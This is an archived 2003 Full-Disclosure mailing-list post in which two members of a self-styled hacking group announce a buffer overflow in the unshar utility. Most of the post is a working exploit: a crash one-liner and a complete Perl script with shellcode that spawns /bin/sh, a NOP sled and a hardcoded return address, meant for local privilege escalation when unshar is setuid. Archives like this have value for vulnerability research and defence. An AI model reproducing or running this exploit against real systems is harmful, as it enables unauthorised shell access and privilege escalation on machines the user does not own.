lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <200312031736.30472.rustymemory@cisco-ninjas.com>
From: rustymemory at cisco-ninjas.com (rustymemory)
Subject: flames security group start to play , yet another vuln found (rustymemory and welshboi)

By: flames.bluefox.net.nz
if unshar suid; then you w00t

proof of concept?

rustymemory@...mes:~$ unshar -f `perl -e 'print"A"x2000'`
............................AAAAAAAAAAAAAASegmentation fault

welshboi@...mes:~$ more unshar.pl
#!/usr/bin/perl
#/usr/bin/unshar local sploit.
#coded by welshboi (deadbeat)
#found by rustymemory
#
#FLAMES SECURITY GROUP
#Private, please dont distribute
#affects all linux distributions , tested on slackware 9.1 and MDK
###############################################
#[deadbeat@...achu sploits]$ perl unshar.pl #
# #
#[] /usr/bin/unshar exploit #
#[] coded by: deadbeat [] #
#[] found by: rustymemory [] #
#_f1GWugHu[SPZ #
# #
#sh-2.05b$ #
###############################################
# 47byte shellcode (exec /bin/sh)
$hell = "\xeb\x1f\x5f\x89\xfc\x66\xf7\xd4\x31\xc0\x8a\x07".
"\x47\x57\xae\x75\xfd\x88\x67\xff\x48\x75\xf6\x5b".
"\x53\x50\x5a\x89\xe1\xb0\x0b\xcd\x80\xe8\xdc\xff".
"\xff\xff\x01\x2f\x62\x69\x6e\x2f\x73\x68\x01";
$egg = 2000;
$buf = 1128;
$nop = "\x90";
$offset = 0;
$ret =0x40055bdc;
if(@ARGV == 1) {$offset = $ARGV[0];}
$addr = pack('l', ($ret + $offset));
for($i = 0; $i<$buf; $i += 4){$evil .=$addr;}
for($i = 0; $i<($egg - length($hell) -100); $i++){$evil .=$nop;}
$evil .= $hell;
print "\n[] /usr/bin/unshar exploit []\n";
print "[] coded by: deadbeat, uk2sec []\n";
print "[] found by: rustymemory []\n\n";
print ("[]trying addr: 0x", sprintf('%lx',($ret + $offset)),"\n");
system("/usr/bin/unshar -f $evil");

---------------------------------------------------------
shouts to ?

calidan(daddeh) , linucks ( wifi whore) , h0stile (the maniac) , and the rest 
of flames security group. and rusty's fiancee


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ